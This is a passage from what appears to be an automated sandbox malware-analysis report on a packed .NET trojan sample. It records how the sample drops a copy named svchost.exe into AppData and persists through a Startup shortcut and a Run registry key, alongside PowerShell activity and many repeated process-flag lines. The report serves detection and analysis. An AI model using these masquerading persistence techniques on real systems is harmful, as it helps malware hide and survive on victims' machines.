              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A2633D push eax; ret 5_2_04A26351
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08A17400 push eax; retf 5_2_08A17401
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04A712AD push ebx; iretd 7_2_04A7131A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04CD42BD push ebx; ret 11_2_04CD42DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04CD636B push eax; ret 11_2_04CD6371

              Persistence and Installation Behavior

              barindex
              Drops PE files with benign system names
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile created: C:\Users\user\AppData\Local\svchost.exeJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile created: C:\Users\user\AppData\Local\svchost.exeJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
